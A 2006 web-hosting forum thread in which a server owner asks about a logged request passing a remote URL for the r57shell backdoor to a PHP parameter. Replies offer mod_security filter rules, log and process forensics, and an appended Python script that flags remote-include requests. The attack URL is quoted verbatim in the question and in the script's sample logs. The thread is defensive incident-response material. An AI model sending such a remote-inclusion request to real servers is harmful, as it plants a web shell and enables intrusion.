The Community Forums


Anyone know what this actually does?

Discussion in 'General Discussion' started by noimad1, Apr 14, 2006.

  1. noimad1

    noimad1 Well-Known Member

    Joined: Mar 27, 2003
    Messages: 627
    Likes Received: 0
    Trophy Points: 16
    Does anyone know if this would actually do anything:


    www.mydomain.com/randomphpfile.php?LOCAL_PATH=http://rst.void.ru/download/r57shell.txt

    I mean would that actually download any files to my server or anything like that?

    I keep getting files in my tmp directory, but I can't find out where they are coming from. I've upgraded all software I am using, and removed any old versions like phpbb2 and such....


    This is the only strange one I see in my log?
     
  2. logix1000

    logix1000 Active Member

    Joined: Dec 12, 2003
    Messages: 34
    Likes Received: 0
    Trophy Points: 6
    Have you secured your /tmp partition?
     
  3. HostMerit

    HostMerit Well-Known Member

    Joined: Oct 24, 2004
    Messages: 160
    Likes Received: 0
    Trophy Points: 16
    Location: New Jersey, USA
    cPanel Access Level: DataCenter Provider
    Use mod_security.

    Add:

    SecFilter "LOCAL_PATH"
    SecFilter "r57shell\.txt"

    Common backdoor shell; securing tmp won't help, it can be easily run from perl.
     
  4. noimad1

    noimad1 Well-Known Member

    Joined: Mar 27, 2003
    Messages: 627
    Likes Received: 0
    Trophy Points: 16
    I am running mod security, so I will add those SecFilters. I'm still kind of new to the mod-security so I wasn't sure exactly how that worked. But if it is that easy to add the filters that is easy enough....

    I'll give it a try.

    Thanks,
     
  5. HostMerit

    HostMerit Well-Known Member

    Joined: Oct 24, 2004
    Messages: 160
    Likes Received: 0
    Trophy Points: 16
    Location: New Jersey, USA
    cPanel Access Level: DataCenter Provider
    I suggest checking out my mod security configuration. I've written a lot of the rules myself, from scouring error logs, dom logs, recent exploits, etc.; it's always updated.

    I've also added rules based upon your attack

    http://www.hostmerit.com/modsec.user.conf

    Please let me know if you have any other questions :D
     
  6. noimad1

    noimad1 Well-Known Member

    Joined: Mar 27, 2003
    Messages: 627
    Likes Received: 0
    Trophy Points: 16

    Thank you very much. I've added the SecFilters and then tried that URL and it said permission denied, so I think that is good.

    Now we will see if that is what they were using to get the files in the tmp directory...
     
  7. randomuser2

    randomuser2 Member

    Joined: Dec 23, 2005
    Messages: 23
    Likes Received: 0
    Trophy Points: 1
    You should really figure out what script is responsible for this. modsec being in place is good, but you still have a vulnerable script on your server that could get you hacked again.

    Next time/if it happens, run "stat" on the file(s) -- i.e.: stat /tmp/whatever.txt

    and note the timestamps (tip: learn what atime, mtime, and ctime are). Then, compare the time the file was placed in /tmp with the times from your webserver logs for each domain. It might take some time, but with some practice and perseverance, you'll locate the vulnerable script. This isn't 100% foolproof, as modifying timestamps is trivial, but you will be headed in the right direction if you do this.
     
  8. noimad1

    noimad1 Well-Known Member

    Joined: Mar 27, 2003
    Messages: 627
    Likes Received: 0
    Trophy Points: 16
    Thank you very much for the information. I will monitor the tmp directory and see if it happens again. I was still concerned about having an insecure script out there. This domain is using so many it is hard to find. Maybe doing what you said can help me track it down...
     
  9. noimad1

    noimad1 Well-Known Member

    Joined: Mar 27, 2003
    Messages: 627
    Likes Received: 0
    Trophy Points: 16

    Ok, I got another one. So what logs exactly would you go through first?
     
  10. HostMerit

    HostMerit Well-Known Member

    Joined: Oct 24, 2004
    Messages: 160
    Likes Received: 0
    Trophy Points: 16
    Location: New Jersey, USA
    cPanel Access Level: DataCenter Provider
    Try

    grep "filename.txt" /usr/local/apache/domlogs/*

    Quick and dirty but might help.

    Also, ps -u nobody: look for anything except httpd, and possibly melange/chats running, things like perl, psybnc, etc. etc.

    Then take the process ID (pid) and cd /proc/(pid)

    Then cat environ and look for PWD (directory) or OLDPWD (last dir); also, while in this dir, ls -al and search for shortcuts back to the user's directory, or where it sprouted from.
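The two investigation steps suggested in this thread (randomuser2's "compare the file's stat timestamps with the webserver logs" and HostMerit's "grep the domlogs, then read PWD/OLDPWD out of /proc/<pid>/environ") can be scripted. The following is an added example written for this page, not code posted by anyone in the thread and not part of cPanel or mod_security. It assumes Apache combined log format (the format of the files under /usr/local/apache/domlogs), uses constructed sample log lines and a constructed environ blob so it runs offline, and flags requests near the drop time whose query parameter carries an external URL, which is the shape of the LOCAL_PATH=http://... request in the first post and what the posted SecFilter rules target:

```python
"""Correlate a dropped /tmp file with nearby web requests (added example)."""
import os
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import urlsplit, parse_qsl

# Apache combined log: host ident user [time] "method target proto" status bytes ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Constructed sample lines (documentation-range IPs); the suspicious target
# reuses the URL quoted in the first post of the thread.
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Apr/2006:03:12:07 -0500] "GET /randomphpfile.php'
    '?LOCAL_PATH=http://rst.void.ru/download/r57shell.txt HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    '198.51.100.9 - - [14/Apr/2006:03:13:40 -0500] "GET /index.php?page=about HTTP/1.1" 200 2310 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [14/Apr/2006:09:45:00 -0500] "GET /randomphpfile.php'
    '?LOCAL_PATH=http://rst.void.ru/download/r57shell.txt HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
]
# Constructed mtime of the dropped file, as `stat` would report it.
DROP_TIME = datetime(2006, 4, 14, 3, 14, 0, tzinfo=timezone(timedelta(hours=-5)))


def parse_log_line(line):
    """Parse one combined-log line; return None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("time"), "%d/%b/%Y:%H:%M:%S %z")
    return {"ip": m.group("ip"), "time": ts, "method": m.group("method"),
            "target": m.group("target"), "status": int(m.group("status"))}


def file_mtime(path):
    """mtime of a real file as an aware datetime (the value stat prints)."""
    return datetime.fromtimestamp(os.stat(path).st_mtime, tz=timezone.utc)


def requests_near(lines, when, window=timedelta(minutes=5)):
    """Log entries whose timestamp lies within +/- window of `when`."""
    hits = []
    for line in lines:
        entry = parse_log_line(line)
        if entry and abs(entry["time"] - when) <= window:
            hits.append(entry)
    return hits


def remote_include_params(target):
    """Query parameters whose value is an external URL (remote-include shape)."""
    query = urlsplit(target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if re.match(r"^(https?|ftp)://", v, re.I)]


def suspects(lines, when, window=timedelta(minutes=5)):
    """Requests near the drop time that pass an external URL as a parameter."""
    out = []
    for e in requests_near(lines, when, window):
        params = remote_include_params(e["target"])
        if params:
            out.append((e["time"], e["ip"], e["target"], params))
    return out


def environ_dirs(environ_bytes):
    """Pull PWD/OLDPWD out of the NUL-separated content of /proc/<pid>/environ."""
    env = {}
    for item in environ_bytes.split(b"\0"):
        if b"=" in item:
            k, _, v = item.partition(b"=")
            env[k.decode(errors="replace")] = v.decode(errors="replace")
    return {k: env[k] for k in ("PWD", "OLDPWD") if k in env}


if __name__ == "__main__":
    # With a real file, replace DROP_TIME by file_mtime("/tmp/whatever.txt")
    # and SAMPLE_LOG by the lines of the domlog for each domain.
    for when, ip, target, params in suspects(SAMPLE_LOG, DROP_TIME):
        print(when.isoformat(), ip, target, params)
    # Constructed environ blob standing in for `cat /proc/<pid>/environ`.
    print(environ_dirs(b"PATH=/usr/bin\0PWD=/home/user/public_html/tmp\0OLDPWD=/tmp\0"))
```

Only the first sample line is reported: it falls inside the five-minute window around the drop time and its LOCAL_PATH value is an external URL; the second is close in time but benign, and the third carries the same payload hours later. The time window is the weak point randomuser2 mentions (timestamps are trivially changed), so the script is a way to shortlist candidate scripts, not proof of which one was abused.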
     